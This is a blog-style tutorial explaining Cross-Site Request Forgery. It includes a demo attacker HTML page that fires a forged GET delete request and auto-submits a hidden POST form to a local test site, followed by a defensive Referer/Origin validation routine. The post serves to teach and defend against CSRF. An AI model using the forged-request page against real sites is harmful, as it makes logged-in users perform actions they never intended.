A few days ago, while thinking about how to handle front-end and back-end authentication, I thought of the CSRF attack. Because I only understood the general principle and had never actually implemented it, I wanted to write a demo to try it out.
CSRF concept
CSRF (Cross-Site Request Forgery), like XSS, is a major web security hazard. An attacker borrows your identity and sends, in your name, a request that looks perfectly legitimate to the server but does what the attacker intended.
CSRF principle
- User C opens the browser, visits trusted website A, and enters a user name and password to log in to website A.
- After the user's credentials are verified, website A generates Cookie information and returns it to the browser. The user is now logged in to website A and can send requests to it.
- Before logging out of website A, the user opens a tab in the same browser and visits website B.
- After receiving the user's request, website B returns some attack code that sends a request to the third-party site A.
- When the browser runs this attack code, it sends the request to website A as instructed by website B, attaching the Cookie information without the user's knowledge. Website A does not know that the request was actually initiated by B, so it processes the request with C's permissions according to user C's Cookie information, and the malicious request from website B is executed.
Implementation
A site with a CSRF vulnerability
Assume that the user logs in successfully and leaves authenticated cookies in the browser and performs some operations, as shown in the figure below:
CSRF attacks via GET and via POST
code
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
</head>
<body>
<button onclick="btn1()">CSRF attacks the GET method</button>
<button onclick="btn2()">CSRF attacks the POST method</button>
<form action="http://localhost:8080/bb" method="post" id="test">
<input style="display:none;" type="text" name="user" value="5"><br>
<input style="display:none;" type="text" name="pass" value="55">
</form>
<script>
function btn1() {
window.location.href = "http://localhost:8080/aa?ID=12345&delete=55"
}
function btn2() {
const f = document.getElementById('test');
f.submit();
}
</script>
</body>
</html>
The execution result
Either way the attack succeeds: the browser automatically attaches the site's cookies to the request, authentication passes, and the operation the user never intended is carried out.
Prevention methods
1. Validate the Referer request header: it records the source address of the HTTP request.
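As an added example (not code from the original post), the following is a server-side version of this check for the localhost:8080 site used in the demo. It assumes a Node.js handler that receives req.headers (Node lowercases header names); the host evil.example and all sample requests are constructed for the illustration. It also shows why the header must be compared as a parsed origin rather than by string prefix.

```javascript
const TRUSTED_ORIGIN = "http://localhost:8080"; // the site being protected

// Weak version: a prefix test on the raw header value. It accepts any URL that
// merely starts with the trusted string, e.g. "http://localhost:8080@evil.example/",
// whose real host is evil.example (the "localhost:8080" part is userinfo).
function naivePrefixCheck(headerValue) {
  return typeof headerValue === "string" && headerValue.startsWith(TRUSTED_ORIGIN);
}

// Parse a header value as a URL and return its origin (scheme://host[:port]),
// or null if the header is absent or not a valid URL.
function originOf(headerValue) {
  if (typeof headerValue !== "string" || headerValue === "") return null;
  try {
    return new URL(headerValue).origin;
  } catch {
    return null; // malformed value: treat as "no usable header"
  }
}

// Decide whether a state-changing request (the demo's GET /aa?...&delete=55 and
// POST /bb) may proceed. Browsers send Origin on cross-site POSTs and Referer on
// the GET navigation used by btn1(), so Origin is checked first, then Referer.
// With neither header present the check cannot be performed, so the request is
// rejected (fail closed); clients whose privacy settings strip both headers
// are blocked as well, which is the trade-off of this method.
function isSameSiteRequest(headers, trustedOrigin = TRUSTED_ORIGIN) {
  const origin = originOf(headers["origin"]);
  if (origin !== null) return origin === trustedOrigin;
  const referer = originOf(headers["referer"]);
  if (referer !== null) return referer === trustedOrigin;
  return false;
}

// Constructed sample requests, as a handler for /aa or /bb would see them.
const SAMPLE_REQUESTS = {
  legitGet: { referer: "http://localhost:8080/profile" },
  legitPost: { origin: "http://localhost:8080", referer: "http://localhost:8080/profile" },
  forgedPost: { origin: "http://evil.example", referer: "http://evil.example/csrf.html" },
  forgedGet: { referer: "http://evil.example/csrf.html" },
  userinfoTrick: { referer: "http://localhost:8080@evil.example/csrf.html" },
  noHeaders: {},
};

// Map each sample to its decision: { legitGet: true, ..., forgedPost: false, ... }.
function evaluateSamples(samples = SAMPLE_REQUESTS) {
  return Object.fromEntries(Object.entries(samples).map(([k, h]) => [k, isSameSiteRequest(h)]));
}
```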